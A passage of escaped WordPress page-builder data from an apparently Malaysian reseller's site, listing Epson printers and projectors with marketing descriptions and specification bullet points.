class=\\\"alignnone wp-image-2418\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-WorkForce-Pro-WF-C5290.png\\\" alt=\\\"\\\" width=\\\"378\\\" height=\\\"213\\\" \\/><\\/p><p>Enjoy low-cost, reliable printing with Epson WorkForce Pro WF-C5290 business printer. Delivering fast print speeds of up to 24ipm with a first page-out time of just 4.8 seconds, it is built to handle the most demanding print jobs. With a range of printing and connectivity features, this printer is the ideal solution for small workgroups that require hassle-free, low-maintenance and productive-boosting printing.<\\/p><ul><li>High yield ink packs<\\/li><li>High-speed auto-duplex printing<\\/li><li>USB, Ethernet, Wi-Fi, Wi-Fi Direct and NFC<\\/li><li>Epson Connect<\\/li><li>Energy\\u00a0saving<\\/li><\\/ul>\",\"align\":\"left\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"c9f78e3\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><span style=\\\"text-align: left; color: #7a7a7a; font-family: Roboto, sans-serif; font-weight: 400; font-size: 0.875rem;\\\">[maxbutton id=\\\"12\\\" ]<\\/span><\\/h4>\",\"align\":\"left\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"94b61d1\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"b740aaa\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><strong>Epson WorkForce WF-100\\u00a0<\\/strong><\\/h4><p><img class=\\\"alignnone wp-image-2419\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-WorkForce-WF-100.png\\\" alt=\\\"\\\" width=\\\"378\\\" height=\\\"213\\\" \\/><\\/p><p>Introducing the Epson WorkForce WF-100, a lightweight portable inkjet printer designed for professionals on the go. Battery-operated with integrated wireless capabilities such as Wi-Fi Direct and Epson Connect, you can have quality colour printouts anytime, anywhere.<\\/p><ul><li>Print speed up to 14 ppm<\\/li><li>Epson Connect<\\/li><li>1.44 Colour LCD Panel<\\/li><li>Wi-Fi and Wi-Fi Direct connectivity<\\/li><li>Built-in battery<\\/li><\\/ul>\",\"align\":\"left\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"96730a6\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":49,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"addc0f3\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><span style=\\\"text-align: left; color: #7a7a7a; font-family: Roboto, sans-serif; font-weight: 400; font-size: 0.875rem;\\\">[maxbutton id=\\\"12\\\" ]<\\/span><\\/h4>\",\"align\":\"left\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"2b0e3f9\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"e754d94\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"fc3866b\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><strong>Epson WorkForce WF-7711<\\/strong><\\/h4>\\n<img class=\\\"wp-image-2420 aligncenter\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-WorkForce-WF-7711.png\\\" alt=\\\"\\\" width=\\\"304\\\" height=\\\"172\\\" \\/>\\n\\nChange the way you print A3+ business documents with the Epson WorkForce WF-7711 printer. Designed for convenience, this smart printer is equipped with a suite of connectivity features, from USB and Ethernet to Wi-Fi Direct and NFC. With PrecisionCore<sup>TM<\\/sup>\\u00a0technology, fast printing speed consistently delivers success in every detail.\\n<ul>\\n \\t<li>Print speeds up to 18ipm for black and 10ipm for colour<\\/li>\\n \\t<li>USB, Ethernet, Wi-Fi, Wi-Fi Direct and NFC<\\/li>\\n \\t<li>Duplex printing up to A3 size<\\/li>\\n \\t<li>Epson DURABrite<sup>TM<\\/sup>\\u00a0Ultra ink<\\/li>\\n \\t<li>4.3\\u201d Colour LCD Touch Panel<\\/li>\\n \\t<li>Print, Scan, Copy Fax with ADF<\\/li>\\n<\\/ul>\\n<div><center>[maxbutton id=\\\"12\\\" ]<\\/center><\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"5178d20\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"b031280\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"b3a013d\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"f2b7b04\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"c71ec36\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"732a1a6\",\"elType\":\"widget\",\"settings\":{\"title\":\"INK TANK SYSTEM\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"e709cb3\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"60cd262\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"97d2102\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><strong>Epson EcoTank L3150<\\/strong>\\n\\n<img class=\\\"alignnone wp-image-2421\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-EcoTank-L3150-.jpg\\\" alt=\\\"\\\" width=\\\"311\\\" height=\\\"175\\\" \\/><\\/h4>\\nSave more with Epson\\u2019s economical and multifunctional printing solutions for business\\u2014the EcoTank L3150\\u2014built to bring down costs, and bring up productivity. The integrated ink tank enables spill-free, error-free refilling with individual bottles that have designated nozzles. Other features include borderless 4R printing and an ultra-high yield of 7,500 coloured and 4,500 black-and-white pages. The EcoTank L3150 also delivers the convenience of wireless connectivity, allowing direct printing from smart devices.\\n<ul>\\n \\t<li>Compact integrated tank design<\\/li>\\n \\t<li>High yield ink bottles<\\/li>\\n \\t<li>Spill-free, error-free refilling<\\/li>\\n \\t<li>Wi-Fi, Wi-Fi Direct<\\/li>\\n \\t<li>Epson Connect (Epson iPrint, Epson Email Print and Remote Print Driver)<\\/li>\\n \\t<li>Borderless printing up to 4R<\\/li>\\n<\\/ul>\\n<div><center>[maxbutton id=\\\"12\\\" ]<\\/center><\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"63366b2\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"8449cce\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><strong>Epson L120 Printer\\u00a0<\\/strong><br \\/><br \\/><img class=\\\"alignnone wp-image-2422\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-L120-Printer.png\\\" alt=\\\"\\\" width=\\\"301\\\" height=\\\"170\\\" \\/><\\/h4><p>The Epson L120 ink tank system printer brings speedy performance with low running costs to all your personal and work projects.<\\/p><ul><li>High-yield ink bottles<\\/li><li>Print speed up to 8.5ipm for black-and-white and 4.5ipm for color<\\/li><li>Compact Size<\\/li><li>Warranty of 2 Years or 20,000 Pages, whichever comes first<\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"9109035\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":169,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"140f583\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<div style=\\\"text-align: center;\\\">[maxbutton id=\\\"12\\\" ]<\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"7d56d33\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"a539e2b\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><strong>Epson M1100 Printer<\\/strong><br \\/><br \\/><img class=\\\"alignnone wp-image-2423\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-M1100-Printer-.png\\\" alt=\\\"\\\" width=\\\"315\\\" height=\\\"178\\\" \\/><\\/h4><p>Efficiency\\u00a0meets economy with the EcoTank monochrome M1100 printer. Look forward to lower business costs with bottles that provide an ultra-high page yield of up to 6,000 pages\\u00a0each. Simplify processes with the integrated ink tank that enables spill - and error-free ink refilling, and enjoy laser-quality text that is smudge-proof and water-resistant with the pigment ink.<\\/p><ul><li>Compact integrated tank design<\\/li><li>High-yield pigment ink bottle<\\/li><li>Spill-free, error-free refilling<\\/li><li>Print speed up to 32ppm (15ipm)<\\/li><li>4 years warranty<\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"e74569a\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":60,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"e157d4e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<div><center>[maxbutton id=\\\"12\\\" ]<\\/center><\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"2ffcc87\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"c140b6d\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"b3a6fcb\",\"elType\":\"widget\",\"settings\":{\"title\":\"LASER PRINTER\",\"header_size\":\"h3\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"a7c8449\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"650cf58\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"82105a8\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Epson AcuLaser C9300N<\\/strong>\\u00a0<img class=\\\"alignnone wp-image-2424\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-AcuLaser-C9300N.png\\\" alt=\\\"\\\" width=\\\"313\\\" height=\\\"177\\\" \\/><\\/p><p>The Epson AcuLaser\\u2122 C9300N breaks new ground with its class-leading 1200dpi standard resolution for A3 colour laser printing. Together with its fast speed and high reliability, it packs superior performance in a cost efficient design that perfectly complements the needs of demanding workgroups.<\\/p><ul><li>1200 x 1200 dpi<\\/li><li>Speed: Up to 30ppm<\\/li><li>First page out in 8.3 sec or less (mono A4), 9.9 sec (colour A4)<\\/li><li>Quality prints with new Epson Technologies<\\/li><li>New print job management features<\\/li><\\/ul><div>[maxbutton id=\\\"12\\\" ]<\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"8295a6c\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"22e2324\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u00a0<strong>Epson WorkForce AL-M320DN\\u00a0<\\/strong><img class=\\\"alignnone wp-image-2426\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-WorkForce-AL-M320DN-.jpg\\\" alt=\\\"\\\" width=\\\"254\\\" height=\\\"296\\\" \\/><\\/p><p>The Workforce AL-M320DN delivers absolute performance and reliability despite their compact size. Equipped with network printing capabilities and blazing fast performance to support ultra-high volume printing, these printers are built for the most demanding office environments. Further boost productivity with the free fleet management software, Epson Device Admin, to organise and monitor printers remotely.<\\/p><ul><li>1200 x 1200 dpi<\\/li><li>Print speed up to 35ppm<\\/li><li>Auto-Duplex<\\/li><li>Ethernet &amp; Epson iPrint<\\/li><li>2 optional paper cassette tray<\\/li><\\/ul><div>[maxbutton id=\\\"12\\\" ]<\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"49ae59d\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"6612146\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Epson WorkForce AL-M8100DN\\u00a0<\\/strong><img class=\\\"alignnone wp-image-2427\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-WorkForce-AL-M8100DN-.png\\\" alt=\\\"\\\" width=\\\"256\\\" height=\\\"144\\\" \\/><\\/p><p>Unleash remarkable efficiency to your workflow. Powered by a 600Mhz dual core processor, the WorkForce AL-8100DN delivers quality A3 and A4 prints with swift speeds of up to 40ppm and is packed with 1GB RAM for faster processing of multiple print jobs.<\\/p><ul><li>1200 x 1200 dpi<\\/li><li>Print speed up to 40 ppm<\\/li><li>Epson iPrint<\\/li><li>Ethernet<\\/li><li>4 optional cassette trays<\\/li><\\/ul><div>[maxbutton id=\\\"12\\\" ]<\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"d3590c0\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"7139e3e\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"77f919a\",\"elType\":\"widget\",\"settings\":{\"title\":\"POS PRINTER\",\"header_size\":\"h3\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"6011ab1\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"751b93e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"14d70f4\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Epson TM-H6000IV\\u00a0<\\/strong><\\/p><p><img class=\\\"alignnone wp-image-2428\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-TM-H6000IV.png\\\" alt=\\\"\\\" width=\\\"224\\\" height=\\\"125\\\" \\/><\\/p><p>The Epson multifunction POS printer TM-H6000IV, features everything retailers need from fast receipt printing and check processing to best-in-class reliability.<\\/p><ul><li>Thermal &amp; Dot Output<\\/li><li>Speed: Up to 300mm\\/sec<\\/li><li>Check printing<\\/li><li>Bi-directional printing<\\/li><li>Supports\\u00a0slip printing, validation and endorsement print<\\/li><\\/ul><div>[maxbutton id=\\\"12\\\" ]<\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"48313a9\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"04c8d3f\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Epson TM-T88V-i\\u00a0<\\/strong><img class=\\\"alignnone wp-image-2429\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-TM-T88V-i.png\\\" alt=\\\"\\\" width=\\\"243\\\" height=\\\"137\\\" \\/><\\/p><p>Create a world of possibilities with TM-T88V-i Intelligent Solution. Equipped with cloud and web-capabilities, you\'ll have access to a variety of intelligent functions delivered by a compact, space-saving printer that fits easily into your business.<\\/p><ul><li>Printing speed of up to 300mm\\/second<\\/li><li>20 million lines for printer mechanism<\\/li><li>Up to 2 million for auto-cutter<\\/li><li>LAN, Serial, USB 2.0 (Type A) x 4<\\/li><li>Control peripherals easily<\\/li><\\/ul><div>[maxbutton id=\\\"12\\\" ]<\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"a458653\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"693238f\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Epson TM-T70II\\u00a0<\\/strong><img class=\\\"alignnone wp-image-2430\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-TM-T70II.png\\\" alt=\\\"\\\" width=\\\"254\\\" height=\\\"143\\\" \\/><\\/p><p>The Epson\'s TM-T70II is the smallest in class receipt printer with a full frontal operation.<\\/p><ul><li>Print method: Thermal line printing<\\/li><li>Width: 79\\u00a0\\u00b1\\u00a00.5 mm<\\/li><li>Print Speed: Up to 250 mm\\/ sec<\\/li><li>Auto-cutter feature<\\/li><\\/ul><div>[maxbutton id=\\\"12\\\" ]<\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"633089e\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"e7998e8\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"ca5c009\",\"elType\":\"widget\",\"settings\":{\"title\":\"PHOTO PRINTER\",\"header_size\":\"h3\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"9e7182b\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"7eee589\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"4c63255\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Epson L1800 A3 Photo Ink Tank Printer<\\/strong><\\/p><p><img class=\\\"alignnone size-full wp-image-2431\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-L1800-Printer.png\\\" alt=\\\"\\\" width=\\\"550\\\" height=\\\"310\\\" \\/><\\/p><p>In creating the next wave of printing innovation, Epson introduces the worlds first truly affordable 6-colour A3+ original ink tank system printer.<\\/p><ul><li>Yield of up to 1,500 4R photos<\\/li><li>Print speed up to 15ppm<\\/li><li>High-yield ink bottles<\\/li><li>1-year warranty or 9,000 prints<\\/li><\\/ul><div>[maxbutton id=\\\"12\\\" ]<\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"4abe3ef\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"9645bf2\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Epson L850 Printer\\u00a0<\\/strong><img class=\\\"alignnone wp-image-2432\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-L850-Printer.png\\\" alt=\\\"\\\" width=\\\"261\\\" height=\\\"147\\\" \\/><\\/p><p>Imaging enthusiasts and professionals can look forward to the 6-colour ink tank system, presenting vibrant borderless prints and unrivalled performance at a remarkably low cost through this 3-in-1 photo printer.<\\/p><ul><li>High-yield ink bottles<\\/li><li>2.7 colour LCD screen<\\/li><li>Direct printing via memory card slot, USB port and PictBridge<\\/li><li>CD\\/DVD printing<\\/li><li>Warranty of 1 year or 3,000 photo prints, whichever comes first<\\/li><\\/ul><div>[maxbutton id=\\\"12\\\" ]<\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"07c207b\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"8ce4aa3\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Epson L805 Printer\\u00a0<\\/strong><img class=\\\"alignnone wp-image-2433\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-L805-Printer-.png\\\" alt=\\\"\\\" width=\\\"240\\\" height=\\\"135\\\" \\/><\\/p><p>The L805s integrated Wi-Fi support and expanded colour gamut of 6 inks brings you ease of printing from your mobile devices over a wireless network so you can print low-cost, lab-quality photos at your convenience.<\\/p><ul><li>Yield of Up to 1,800 4R photos<\\/li><li>Lowest Printing Costs<\\/li><li>Wi-Fi &amp; Epson iPrint<\\/li><li>CD\\/DVD Printing Capability<\\/li><li>1 year or 3,000 prints warranty<\\/li><\\/ul><div>[maxbutton id=\\\"12\\\" ]<\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"65279bf\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"c65e6e9\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"57b8f7e\",\"elType\":\"widget\",\"settings\":{\"title\":\"Projectors for Work\",\"header_size\":\"h3\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"bbe338f\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"4e4173d\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"1c6bf5d\",\"elType\":\"widget\",\"settings\":{\"title\":\"CORPORATE AND EDUCATION\\u00a0\",\"header_size\":\"h3\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7e9242e\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"61d6693\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"bd3c8b4\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Epson EB-2055<\\/strong><\\/p><p><img class=\\\"alignnone wp-image-2434\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-EB-2055.png\\\" alt=\\\"\\\" width=\\\"245\\\" height=\\\"163\\\" \\/><\\/p><p>Leave the lights on and take control whether in the meeting room or classroom. Epson\\u2019s EB-2055 projector is engineered to shine outstandingly even in well-lit environments to enrich your presentation experience. Your brilliant presentations are made even better and more convenient with the new gesture-control function that allows you to navigate between your slides without the use of a peripheral device.<\\/p><ul><li>XGA Resolution<\\/li><li>White and Colour Light Output at 5,000 lumens<\\/li><li>Gesture Presenter<\\/li><li>Multi-PC Projection<\\/li><li>2 x HDMI<\\/li><li>Split Screen<\\/li><\\/ul><div>[maxbutton id=\\\"12\\\" ]<\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"a9b5eee\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"fe4d6fd\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Epson EB-2142W<\\/strong>\\u00a0<img class=\\\"alignnone wp-image-2435\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-EB-2142W.jpg\\\" alt=\\\"\\\" width=\\\"245\\\" height=\\\"138\\\" \\/><\\/p><p>Enjoy success and unparalleled performance with Epson business projectors. Fully maximise your office space and experience a variety of connectivity options for your ultimate convenience. Along with long lamp-life and maintenance cycles, potential for saving costs and improving energy efficiency is now made possible for you. Every component is skillfully innovated with attention to detail in mind, including the integrated 3LCD technology that will provide you with stunning colour brightness for quality images.<\\/p><ul><li>White and Colour Brightness at 4,200lm<\\/li><li>WXGA Resolution<\\/li><li>12000 hours lamp life in eco-mode<\\/li><li>MHL-enabled<\\/li><li>Multi-PC Projection<\\/li><li>Horizontal Keystone Slider<\\/li><li>Miracast<sup>\\u00ae<\\/sup><\\/li><\\/ul><div>[maxbutton id=\\\"12\\\" ]<span style=\\\"font-size: 10.5px;\\\"><br \\/><\\/span><\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"24b65ae\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"a26a32f\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Epson EB-L500W\\u00a0<\\/strong><img class=\\\"wp-image-2436 aligncenter\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-EB-L500W.jpg\\\" alt=\\\"\\\" width=\\\"251\\\" height=\\\"142\\\" \\/><\\/p><p>The compact, affordable EB-L500W laser projector delivers powerful performance for education and business applications. Get bright, vivid images with 5,000 lumens colour\\/white brightness. This wireless projector also offers WXGA resolution and Full HD support. Featuring breakthrough laser technology, it delivers a laser light source of up to 20,000 hours. And, it offers virtually maintenance-free operation for the life of the optical engine. Plus, it features a Dynamic contrast ratio of up to 2,500,000:1. It also includes wireless networking with enterprise-level security, and advanced installation features.<\\/p><ul><li>5,000 lumens colour\\/white brightness<sup>\\u00a0<\\/sup><\\/li><li>Colourful WXGA; up to 2,500,000:1 Dynamic contrast ratio<\\/li><li>Laser light source of up to 20,000 hours<\\/li><li>Virtually maintenance-free for optical engine life<\\/li><\\/ul><div>[maxbutton id=\\\"12\\\" ]<\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"cd625e2\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"8750887\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"c4ec64b\",\"elType\":\"widget\",\"settings\":{\"title\":\"ACCENT LIGHTING LASER PROJECTORS\",\"header_size\":\"h3\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"5f02a57\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"993393a\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"e46d09c\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Epson LightScene EV-105<\\/strong><\\/p><p><img class=\\\"wp-image-2437 aligncenter\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-LightScene-EV-105.jpg\\\" alt=\\\"\\\" width=\\\"263\\\" height=\\\"176\\\" \\/><\\/p><p>Create stunning visual displays and immersive environments with the LightScene EV-105, the cutting-edge digital signage solution from Epson. A convergence of lighting and display technology, LightScene laser projectors captivate audiences by simultaneously illuminating and projecting on virtually any surface or material, unleashing dynamic, experiential content for digital art, commercial signage and d\\u00e9cor applications. Designed to blend in discreetly to any setting \\u2014 from retail, hospitality and event spaces to showrooms and museums \\u2014 LightScene EV-105 offers a sleek, black spotlight design, with an array of configuration, mounting and programming options.<\\/p><ul><li>Laser projector for digital art and signage<\\/li><li>Seamlessly blends into virtually any environment<\\/li><li>Up to 20,000 hours of virtually maintenance-free operation<\\/li><li>360-degree mounting: floors, walls or ceilings<\\/li><li>Remote management and control tools<\\/li><li>Best New Award Overall<\\/li><\\/ul><div>[maxbutton id=\\\"12\\\" ]<\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"b9132fb\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"5a3decf\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"ccb5acc\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"45f89fa\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"e7ec2bf\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3>ULTRA PORTABLE<\\/h3><p><strong>Epson EB-1785W\\u00a0<\\/strong><\\/p><p><img class=\\\"alignnone wp-image-2438\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-EB-1785W.png\\\" alt=\\\"\\\" width=\\\"236\\\" height=\\\"133\\\" \\/><\\/p><p>The Epson EB-1785W packs superior imaging quality along with a suite of connectivity and usability features into a body weighing only 1.83kg and 44mm slim. Wirelessly connect your smart devices to the projector via Wi-Fi, Miracast, iProjection application or NFC technology. The EB-1785W comes with Gesture Presenter technology, which allows you to transit between slides without a clicker. Lastly, with Epson\'s 3LCD technology that delivers up to 3 times wider colour gamut and brightness, you can astound audiences anywhere you go.<\\/p><ul><li>White Light Output 3,200 lumens, Colour Light Output 3,200 lumens<\\/li><li>WXGA Resolution<\\/li><li>Real-Time Auto Keystone Correction<\\/li><li>Split Screen Projection<\\/li><li>Hassle-Free Presentation with USB 3-in-1 Display Feature and Epson iProjection<\\/li><\\/ul><div>[maxbutton id=\\\"12\\\" 